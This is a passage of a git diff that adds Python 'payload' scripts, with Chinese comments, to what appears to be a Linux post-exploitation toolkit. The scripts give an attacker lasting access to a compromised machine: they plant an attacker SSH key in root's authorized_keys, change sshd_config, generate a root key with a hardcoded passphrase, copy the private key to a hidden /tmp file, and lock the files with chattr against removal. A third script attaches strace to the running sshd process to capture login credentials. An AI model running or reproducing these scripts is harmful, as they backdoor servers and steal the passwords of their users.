AAAAC3NzaC1lZDI1NTE5AAAAIDvfxeBxW8qqV4wfyMBylxVDyd/Cq9N8psk2zpwDf9SX kali@kali" + # 调用 miyue 函数来在文件末尾写入新内容 + # ssh-keygen -t ed25519 -N "admin!@#45123" + miyue("HostKey /etc/ssh/ssh_host_ed25519_key") + miyue("PubkeyAuthentication yes") + miyue("AuthorizedKeysFile .ssh/authorized_keys") + authorized_keys(id_ed25519_pub) + ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys') + file_key() diff --git a/payload/sshkey/sshkey_target.py b/payload/sshkey/sshkey_target.py new file mode 100644 index 0000000..87f98e8 --- /dev/null +++ b/payload/sshkey/sshkey_target.py @@ -0,0 +1,60 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def generate_ssh_key(password): + command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /root/.ssh/id_ed25519' + # 连接PubkeyAcceptedKeyTypes=+ssh-rsa + p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + output, error = p.communicate() + + if p.returncode == 0: + print("SSH密钥生成成功!") + else: + print("SSH密钥生成失败。错误信息:") + print(error.decode()) + +def file_key(): + file_path = "/root/.ssh/authorized_keys" + if os.path.exists(file_path): + print("文件写入成功") + else: + print("文件写入失败") + + +if __name__ == '__main__': + # 调用 miyue 函数来在文件末尾写入新内容 + miyue("HostKey /etc/ssh/ssh_host_ed25519_key") + miyue("PubkeyAuthentication yes") + miyue("AuthorizedKeysFile .ssh/authorized_keys") + # 调用 generate_ssh_key 函数生成SSH密钥对 + password = "admin!@#45123" + generate_ssh_key(password) + ml('cat /root/.ssh/id_ed25519.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/') + ml('cp /root/.ssh/id_ed25519 /tmp/.11') + ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys') + file_key() diff --git a/payload/strace/sshd.py b/payload/strace/sshd.py new file mode 100644 index 0000000..e9d29ef --- /dev/null +++ b/payload/strace/sshd.py @@ -0,0 +1,31 @@ +# coding=utf-8 +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + +def check_strace(): + j = ml('strace -V') + if 'strace -- version' in j: + print('成功') + else: + print('失败') + +if __name__ == '__main__': + os.system("""(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)""") + os.system("""(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)""") + check_strace() diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..7e8be38 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +colorama +termcolor +argparse